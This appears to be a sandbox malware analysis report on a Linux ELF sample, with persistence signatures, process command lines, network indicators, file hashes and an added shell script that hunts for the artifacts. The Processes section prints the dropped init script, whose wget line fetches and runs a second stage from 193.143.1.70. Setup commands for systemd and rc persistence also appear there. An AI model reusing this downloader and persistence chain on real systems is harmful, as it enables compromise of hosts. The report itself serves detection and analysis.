Malware Analysis Report

2025-05-28 20:28

Sample ID 241125-dls4bavpdw
Target e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf
SHA256 e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911
Tags
antivm defense_evasion discovery persistence privilege_escalation
score
7/10

Analysis Overview

score
7/10

SHA256

e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911

Threat level: shows suspicious behavior

The file e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf was classified as showing suspicious behavior (score 7/10).

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

File and Directory Permissions Modification

Modifies Watchdog functionality

Creates/modifies environment variables

Modifies init.d

Modifies systemd

Checks mountinfo of local process

Modifies rc script

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK (Enterprise Matrix V15): the technique table is not included in this copy of the report.

Analysis: static1

Detonation Overview

Reported

2024-11-25 03:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 03:06

Reported

2024-11-25 03:08

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for modification /dev/misc/watchdog /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/2629/mountinfo /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/system /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for modification /etc/init.d/sh /bin/sh N/A

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.local /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/systemd/system/custom.service /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/status /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for reading /proc/1/cgroup /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf N/A
File opened for reading /proc/filesystems /usr/bin/systemctl N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A

Processes

/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf

[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911.elf]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/usr/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "<script>" > /etc/init.d/sh]

The sandbox prints each argv element joined by spaces, so the newlines inside the quoted script appear as spaces in the raw listing. The quoted text, with its line structure restored, is:

    #!/bin/sh
    # /etc/init.d/sh
    case \"$1\" in
      start)
        echo 'Starting sh'
        /bin/sh &
        wget http://193.143.1.70/ -O /tmp/lol.sh
        chmod +x /tmp/lol.sh
        /tmp/lol.sh &
        ;;
      stop)
        echo 'Stopping sh'
        killall sh
        ;;
      restart)
        $0 stop
        $0 start
        ;;
      *)
        echo \"Usage: $0 {start|stop|restart}\"
        exit 1
        ;;
    esac
    exit 0

Two caveats on this command. First, $0 and $1 sit inside the double-quoted echo argument, so the sh -c that runs it expands them at write time (with no further arguments, $1 is empty and $0 is sh). If the listing reproduces the argv exactly, the installed /etc/init.d/sh contains case "" in, which falls through to the usage branch and exits 1 without reaching the wget. The report records only hashes for /etc/init.d/sh (see Files), not its contents, so the check is to hash both candidate renderings and compare against the SHA256 given there. Second, even as intended, the script downloads http://193.143.1.70/ to /tmp/lol.sh and runs it only when invoked with start at boot, through the /etc/rc.d/S99sh symlink created below, so no traffic to 193.143.1.70 should be expected in the Network section of a short detonation.

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/usr/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/usr/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/usr/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
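
The command lines above form a three-pronged persistence chain: a systemd unit (custom.service) enabled through systemctl, an init script /etc/init.d/system symlinked into /etc/rcS.d, and a second init script /etc/init.d/sh, symlinked into /etc/rc.d, that fetches a second stage. The POSIX shell script below is an added example written for this page, not code from the sandbox report or from the sample: it hunts a filesystem root for exactly those artifacts and for the download marker strings from the dropped script, so it can be pointed at a live host (/) or at a mounted disk image. The artifact paths, the IP and the /tmp/lol.sh name are taken from this report; the function names (hunt_persistence, count_findings, make_test_tree) are my own, and make_test_tree builds a constructed directory tree with stand-in file contents (the real files are known here only by their hashes) so the hunt can be exercised offline.

```shell
#!/bin/sh
# Added example for this page (not code from the sandbox report or the sample).
# Hunts a filesystem root for the persistence artifacts recorded in the
# Processes and Files sections above.  Usage: sh hunt.sh [ROOT]   (ROOT defaults to /)

# Paths the dropper created or symlinked, relative to the root being checked.
ARTIFACTS="etc/init.d/system
etc/init.d/sh
etc/rcS.d/S99system
etc/rc.d/S99sh
etc/systemd/system/custom.service"

# Files the dropper opened for modification whose contents are worth grepping
# for the second-stage download seen in the dropped /etc/init.d/sh.
CONTENT_FILES="etc/init.d/sh
etc/rc.local
etc/profile"

# Print one line per finding under ROOT ($1).  Always returns 0; use
# count_findings for a numeric verdict.
hunt_persistence() {
    root="${1:-/}"
    root="${root%/}"          # strip a trailing slash so "$root/$p" stays clean
    for p in $ARTIFACTS; do
        # -L catches symlinks even when their target is missing: a dangling
        # /etc/rcS.d/S99system on a mounted image is still an indicator.
        if [ -e "$root/$p" ] || [ -L "$root/$p" ]; then
            if [ -L "$root/$p" ]; then
                printf 'artifact: %s -> %s\n' "$p" "$(readlink "$root/$p")"
            else
                printf 'artifact: %s\n' "$p"
            fi
        fi
    done
    for f in $CONTENT_FILES; do
        # Marker strings come from the dropped init script in this report.
        if [ -f "$root/$f" ] && grep -q -e '193\.143\.1\.70' -e '/tmp/lol\.sh' -- "$root/$f"; then
            printf 'second-stage download in: %s\n' "$f"
        fi
    done
    return 0
}

# Number of findings under ROOT ($1), as a bare integer.
count_findings() {
    hunt_persistence "$1" | wc -l | tr -d ' '
}

# Constructed test tree mimicking the filesystem changes in this report.
# File contents are stand-ins; only the paths and symlink targets are real.
make_test_tree() {
    d="$1"
    mkdir -p "$d/etc/init.d" "$d/etc/rcS.d" "$d/etc/rc.d" "$d/etc/systemd/system"
    printf '#!/bin/sh\nexit 0\n' > "$d/etc/init.d/system"
    printf '#!/bin/sh\nwget http://193.143.1.70/ -O /tmp/lol.sh\n' > "$d/etc/init.d/sh"
    printf '[Unit]\nDescription=custom\n' > "$d/etc/systemd/system/custom.service"
    ln -s /etc/init.d/system "$d/etc/rcS.d/S99system"
    ln -s /etc/init.d/sh "$d/etc/rc.d/S99sh"
    # A benign /etc/profile must not be reported.
    printf '# /etc/profile\numask 022\n' > "$d/etc/profile"
}

# Stand-alone use: hunt the root given on the command line.
if [ "$#" -gt 0 ]; then
    hunt_persistence "$1"
fi
```

On a live host run it as root against / and treat any line of output as a reason to pull the file hashes and compare them with the Files section; the systemd unit is listed by path only, so a follow-up `systemctl is-enabled custom.service` on the host tells you whether the enable step in the process list succeeded.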

Network

Country  Destination          Domain  Proto
N/A      224.0.0.251:5353     N/A     udp
US       154.216.19.139:199   N/A     tcp
US       154.216.19.139:199   N/A     tcp
US       154.216.19.139:199   N/A     tcp

224.0.0.251:5353 is the mDNS multicast group and is most likely background traffic from the Ubuntu guest rather than sample activity. The three TCP connections to 154.216.19.139:199 are the only outbound traffic the report attributes to the run. The wget to http://193.143.1.70/ in the dropped /etc/init.d/sh does not appear here: that script is only wired to run at boot via /etc/rc.d/S99sh, and nothing in this report shows it executing during the 128 s network window.

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5